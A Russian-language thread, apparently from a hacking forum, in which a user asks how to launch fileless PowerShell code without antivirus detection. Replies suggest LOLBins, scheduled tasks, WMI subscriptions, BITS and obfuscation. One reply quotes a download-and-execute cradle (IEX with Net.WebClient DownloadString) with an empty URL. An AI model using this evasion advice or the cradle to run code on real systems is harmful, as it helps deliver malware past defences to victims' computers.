• XSS.stack #1 – первый литературный журнал от юзеров форума

Передача управления на Powershell

Отслеживать
WhiteDragon

WhiteDragon

AMSI bypass
Пользователь
Регистрация
01.07.2021
Сообщения
165
Реакции
137
Депозит
0.0051
Все методы которые юзал - палятся.
Задача: передать управление на powershell с аргументами -c и -e и исполнить код.
Тот же Iex download string или просто Write-Host дефом палится. Он даже не пытается чекнуть что в аргументах, а просто ставит детект.
Тот же vbs, vbs через js, нейтив, ярлык, CreateProcess. По моим наблюдениям даже простой запуск powershell палится.
Куда копать?
 
Radisson сказал(а):
Не силён в скриптовых языках, но попробуй передавать управление не явно, например, через любой lolbin. Планировщик, подписки WMI.
Пробывал через планировщик, как ты сказал - все работет. Но мне нужен запуск сразу, ибо софт так написан.
 
WhiteDragon сказал(а):
Пробывал через планировщик, как ты сказал - все работет. Но мне нужен запуск сразу, ибо софт так написан.
Инициируй выполнение задания, выполнится сразу.
 
Radisson сказал(а):
Инициируй выполнение задания, выполнится сразу.
протестирую. сяб.

Есть еще методы народ?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
WhiteDragon сказал(а):
Есть еще методы народ?
Так лолбины тебя не устраивают, или чего?
lolbas-project.github.io

Forfiles on LOLBAS

Forfiles.exe is a living-of-the-land file containing unexpected functionality that can be abused by attackers; this page lists all its use cases.
lolbas-project.github.io lolbas-project.github.io
 
DildoFagins сказал(а):
Так лолбины тебя не устраивают, или чего?
lolbas-project.github.io

Forfiles on LOLBAS

Forfiles.exe is a living-of-the-land file containing unexpected functionality that can be abused by attackers; this page lists all its use cases.
lolbas-project.github.io lolbas-project.github.io
IEX (New-Object Net.WebClient).DownloadString('') - детектит везде на это.
У меня файллесс. Хз че как делать
 
Пожалуйста, обратите внимание, что пользователь заблокирован
www.trustedsec.com

BITS for Script Kiddies

Use BITS to live off the land by leveraging its file transfer, copying, and execution capabilities, allowing you to evade detection and save your tools…
www.trustedsec.com www.trustedsec.com
 
Haunt сказал(а):
Уйдёшь от этого и перестанет.
-file тоже детектит и твой метод тоже
Скрытый контент для пользователей: Haunt.
 
WhiteDragon сказал(а):
-file тоже детектит и твой метод тоже
Скрытое содержимое
Детект может становиться другой природы, по факту у тебя их может быть несколько, но до второго попросту не доходит. А потом когда фиксишь первый, видишь уже детект с под второго момента и думаешь, что проблему ты не исправил. Комплекс мер нужно применять и смотреть. Изменение логики стартера. Обфускации. Проверка пш скриптов отдельно в консоли пш, без стартера. Ты даже по факту не знаешь из-за чего триггерит. А чтобы исправить проблему ее сначала нужно найти.
 
Haunt сказал(а):
Детект может становиться другой природы, по факту у тебя их может быть несколько, но до второго попросту не доходит. А потом когда фиксишь первый, видишь уже детект с под второго момента и думаешь, что проблему ты не исправил. Комплекс мер нужно применять и смотреть. Изменение логики стартера. Обфускации. Проверка пш скриптов отдельно в консоли пш, без стартера. Ты даже по факту не знаешь из-за чего триггерит. А чтобы исправить проблему ее сначала нужно найти.
трейсил. Пришел к запуску файла в котором обуф код. Но я думаю, что базово хотя бы строки нужно обуфцировать.
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх